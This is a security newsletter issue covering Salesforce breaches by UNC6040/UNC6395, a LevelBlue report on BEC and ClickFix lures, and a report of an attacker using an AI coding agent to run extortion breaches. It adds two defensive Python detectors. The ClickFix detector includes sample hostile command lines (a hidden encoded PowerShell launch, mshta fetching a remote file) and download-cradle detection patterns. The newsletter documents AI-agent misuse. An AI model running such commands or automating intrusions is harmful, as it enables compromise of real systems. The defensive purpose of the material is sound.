
Welcome to The Optery Dispatch — a newsletter delivering the latest insights on threat intelligence and proactive cybersecurity strategy. In Issue #5, published September 30, 2025, we cover:
- Salesforce Attacks: FBI FLASH Alert
- LevelBlue’s Latest Threat Trends Report: BEC and social engineering dominate
- Anthropic Threat Intelligence Report: One Hacker using Agentic AI breached multiple organizations
Salesforce Attacks: FBI FLASH Alert
UNC6040 and UNC6395 are breaking into Salesforce environments to steal data and extort victims.
The FBI, in an alert from September 12, has warned that two hacker groups, UNC6040 and UNC6395, linked to ShinyHunters and overlapping with Scattered Spider and Lapsus$, are actively targeting Salesforce environments using two different initial access methods. Victims include major global brands such as Google, Adidas, Qantas, Allianz Life, Cisco, Louis Vuitton, Dior, Tiffany & Co., Cloudflare, Zscaler, Tenable, CyberArk, Elastic, BeyondTrust, Proofpoint, JFrog, Nutanix, Qualys, Rubrik, Cato Networks, Palo Alto Networks, and more.
UNC6040 gained access through vishing: attackers impersonated IT staff in calls to company help desks. In some cases they tricked staff into handing over credentials and MFA codes; in others they convinced them to approve a malicious “connected app” that granted OAuth tokens for data exfiltration.
UNC6395, meanwhile, leveraged OAuth tokens stolen in a compromise of Salesloft’s GitHub repos, using them to infiltrate Salesforce environments and pull sensitive support case data. That exfiltrated data included AWS keys, passwords, and Snowflake tokens, giving attackers potential access to other cloud environments. Salesloft and Salesforce revoked the stolen tokens on August 20, 2025.
According to BleepingComputer, the attackers themselves have claimed responsibility for both clusters of activity under the name “Scattered Lapsus$ Hunters.” The FBI’s alert notes that “some UNC6040 victims have subsequently received extortion emails allegedly from the ShinyHunters group, demanding payment in cryptocurrency to avoid publication of exfiltrated data.”
The FBI advises training call-center staff against vishing, enforcing phishing-resistant MFA, applying least-privilege controls to accounts and integrations, monitoring API usage, and rotating tokens regularly.
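Of the FBI's recommendations, "monitoring API usage" is the one that catches both clusters after the initial access succeeds: a malicious connected app approved during a vishing call and a stolen OAuth token both show up as an unfamiliar application pulling unusually large volumes of records. The following Python snippet is an added illustration of that monitoring idea, not code from the FBI, Salesforce, or Optery. The event schema (fields `ts`, `user`, `app`, `rows`), the allowlist, the thresholds, and the sample events are all constructed assumptions; a real deployment would map them onto the audit feed your CRM actually exports.

```python
import json
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample events (hypothetical, simplified schema; field names are
# assumptions, not the fields of any real vendor API). One JSON object per line.
SAMPLE_EVENTS = """
{"ts":"2025-08-20T09:00:00Z","user":"alice@example.com","app":"Approved Reporting","op":"Query","rows":120}
{"ts":"2025-08-20T09:30:00Z","user":"alice@example.com","app":"Approved Reporting","op":"Query","rows":80}
{"ts":"2025-08-20T10:00:00Z","user":"bob@example.com","app":"Data Loader Helper","op":"Query","rows":9000}
{"ts":"2025-08-20T10:20:00Z","user":"bob@example.com","app":"Data Loader Helper","op":"Query","rows":8000}
{"ts":"2025-08-20T11:00:00Z","user":"carol@example.com","app":"Approved Reporting","op":"Query","rows":500}
"""

APPROVED_APPS = {"Approved Reporting"}   # constructed allowlist of connected apps
BULK_ROWS_THRESHOLD = 10_000             # rows per (user, app) inside the window
WINDOW = timedelta(hours=1)


@dataclass
class Finding:
    rule: str
    user: str
    app: str
    detail: str


def parse_events(text):
    """Parse newline-delimited JSON into a list of event dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect(events, approved=APPROVED_APPS, threshold=BULK_ROWS_THRESHOLD, window=WINDOW):
    """Return findings for (a) connected apps not on the allowlist and
    (b) any (user, app) pair whose queried rows exceed `threshold` within `window`."""
    findings = []
    flagged_apps, bulk_alerted = set(), set()
    recent = defaultdict(deque)   # (user, app) -> deque of (timestamp, rows)
    running = defaultdict(int)    # (user, app) -> rows currently inside the window

    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["user"], ev["app"])
        ts = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))

        # Rule 1: an application nobody approved is talking to the API.
        if ev["app"] not in approved and key not in flagged_apps:
            flagged_apps.add(key)
            findings.append(Finding("unapproved_connected_app", ev["user"], ev["app"],
                                    f"first seen {ev['ts']}"))

        # Rule 2: sliding-window volume check for bulk data pulls.
        q = recent[key]
        q.append((ts, ev["rows"]))
        running[key] += ev["rows"]
        while q and ts - q[0][0] > window:
            _, old_rows = q.popleft()
            running[key] -= old_rows
        if running[key] > threshold and key not in bulk_alerted:
            bulk_alerted.add(key)
            findings.append(Finding("bulk_export", ev["user"], ev["app"],
                                    f"{running[key]} rows within {window}"))
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_EVENTS)):
        print(f"[{f.rule}] user={f.user} app={f.app} {f.detail}")
```

In the constructed data, `bob@example.com` trips both rules: the "Data Loader Helper" app is not on the allowlist, and its two queries twenty minutes apart total 17,000 rows, above the hourly threshold. The allowlist is the piece that turns "least privilege for integrations" into something measurable: every connected app that is allowed to exist should be on it, so anything else is an alert by construction.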
In addition to the FBI’s recommendations, it’s important to remember that successful impersonation depends on access to employee data. The attackers behind these Salesforce breaches have claimed they originate from and overlap with Lapsus$, Scattered Spider, and ShinyHunters. As we noted in the last Dispatch, the latest joint advisory on Scattered Spider notes that the group enriches its social engineering/vishing campaigns with information from social media, commercial data brokers, and other sources. Reducing exposed PII across these channels cuts off the raw material attackers rely on, making impersonation attempts far harder to execute.
Read the FBI advisory: 250912.pdf
Learn more:
LevelBlue’s Latest Threat Trends Report: BEC and social engineering dominate
BEC and social engineering accounted for a whopping 96% of recent incidents investigated by LevelBlue
LevelBlue’s latest Threat Trends report, covering incidents investigated from January–May 2025, shows social engineering dominating: nearly all intrusions came down to Business Email Compromise (BEC) or other forms of social engineering.
BEC accounted for 57% of incidents, while non-BEC social engineering, bolstered by fake CAPTCHA/“ClickFix” campaigns, jumped 214% and made up 39%. Put together, that’s nearly all incidents tied to social engineering tactics.
Edition One of LevelBlue’s Threat Trends Report (released in February and covering H2 2024) provided important context on how BEC actually works: LevelBlue found that 96% of BEC cases with a known entry point began with phishing-driven credential harvesting. In other words, BEC overwhelmingly depends on social engineering at the initial compromise stage.
Edition Two highlights the rise of ClickFix attacks. The campaigns begin either via phishing/malspam or through injected code on compromised sites. In practice, phishing is the most common delivery path; the fake CAPTCHA is simply the new trick once the victim clicks through.
The report notes that “fake CAPTCHA campaigns, including ClickFix, rely on social engineering techniques, exploiting the appearance of legitimacy to trick victims into executing malicious scripts.”
According to the report, ClickFix campaigns “showed an astounding 1,450% jump in related incidents from the second half of 2024 to the first half of 2025.” LevelBlue warns this technique is poised to become a “go-to” initial access method for the next year.
Takeaway for defenders: Social engineering remains the universal entry point. Traditional credential phishing fuels most BEC, and fake CAPTCHAs are emerging as the next big lure. Email filtering and awareness are not enough. Defenses must include:
- Personal-data removal to shrink attackers’ reconnaissance pool and prevent targeted phishing campaigns.
- Phishing-resistant MFA to prevent credential abuse.
- Strict URL/DNS filtering to block lure domains and malvertising chains.
- Browser hardening and EDR tuned for clipboard hijacks and suspicious script execution.
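The last bullet, EDR tuned for clipboard hijacks and suspicious script execution, is the one most teams have not yet written a rule for. What a ClickFix lure ultimately produces on the endpoint is a user-launched interpreter (typically from the Run dialog, so the parent is the shell) carrying an encoded or remote-fetching command line. The Python below is an added example of that detection logic, not code from LevelBlue, Proofpoint, or Optery; the process-creation events, the placeholder domain, and the indicator patterns are constructed assumptions meant to be tuned against your own telemetry.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation events (not real telemetry). Field names are an
# assumption modelled on a generic EDR "parent / image / command line" record.
SAMPLE_PROCESS_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -NoP -enc QUFBQQ=="},                     # ClickFix-style
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://captcha-verify.example.invalid/check.hta"},       # ClickFix-style
    {"parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},                     # scheduled task
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe notes.txt"},                                            # benign
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c echo hello"},                                            # user, no indicators
]

# A Run-dialog launch shows the desktop shell as the parent process.
LAUNCHERS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that legitimate user-typed commands rarely combine.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)\s-e(?:nc(?:odedcommand)?)?\s"),
    "hidden_window":   re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "remote_url":      re.compile(r"(?i)https?://"),
    "download_cradle": re.compile(r"(?i)(downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\biex\b|invoke-expression)"),
}


@dataclass
class Finding:
    image: str
    cmdline: str
    indicators: list = field(default_factory=list)


def classify(event):
    """Return a Finding when a shell-spawned interpreter carries at least one
    suspicious command-line indicator, else None."""
    if event["parent"].lower() not in LAUNCHERS:
        return None
    if event["image"].lower() not in INTERPRETERS:
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    if not hits:
        return None
    return Finding(event["image"], event["cmdline"], hits)


def scan(events):
    """Apply classify() across a batch of process-creation events."""
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_PROCESS_EVENTS):
        print(f"{f.image}: {', '.join(f.indicators)} :: {f.cmdline}")
```

Only the first two constructed events are flagged: the PowerShell launch for its encoded, hidden-window command and the mshta launch for the remote URL. The scheduled-task run is skipped because its parent is not the desktop shell, and the plain `cmd.exe /c echo` launch is skipped because it carries no indicator. Requiring both the launcher context and a command-line trait is what keeps this from paging on every administrator who opens PowerShell from the Start menu.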
Read the full report here: LevelBlue Threat Trends Report, 2025, Edition Two
Learn more: From Clipboard to Compromise: A PowerShell Self-Pwn | Proofpoint AU
Anthropic Threat Intelligence Report: One Hacker using Agentic AI breached multiple organizations
An attacker used an AI coding agent to run entire breaches end-to-end.
Anthropic’s latest threat intel report details how a single operator leveraged Claude Code to automate every phase of an intrusion:
“A cybercriminal used Claude Code to conduct a scaled data extortion operation across multiple international targets in a short timeframe. This threat actor leveraged Claude’s code execution environment to automate reconnaissance, credential harvesting, and network penetration at scale, potentially affecting at least 17 distinct organizations in just the last month across government, healthcare, emergency services, and religious institutions.”
The AI agent scanned thousands of VPN endpoints and internet-facing systems, guided credential harvesting and privilege escalation, developed custom malware with anti-detection features, and exfiltrated sensitive data including healthcare records, government credentials, and financial information. It also organized the stolen data and generated tailored ransom notes with calculated demands of up to $500,000.
This case is likely a harbinger of more to come: agentic AI is lowering the barrier for attackers and making it possible for even a single operator to carry out breaches at a scale and speed that once required entire skilled teams.
The same techniques (API-driven aggregation, large-scale scraping, automated behavioral profiling) can just as easily be applied to harvesting public PII from data brokers, people-search sites, breach repositories, and social media, fueling highly targeted mass social engineering, credential-cracking, and account takeover campaigns. Reducing exposures of all kinds, from internet-facing systems to employee and executive PII, is essential to disrupt this emerging AI-powered threat.
The report includes other case studies and notes that “while specific to Claude, the case studies presented…likely reflect consistent patterns of behaviour across all frontier AI models.”
Read the full report here: Detecting and countering misuse of AI: August 2025 | Anthropic
Thanks for reading! Want us to write about something specific? Submit a topic or idea.
If you’re looking to reduce your organization’s exposed PII and prevent phishing, voice and messaging scams, credential theft, and other PII-based threats, Optery can help. Get started here: Optery for business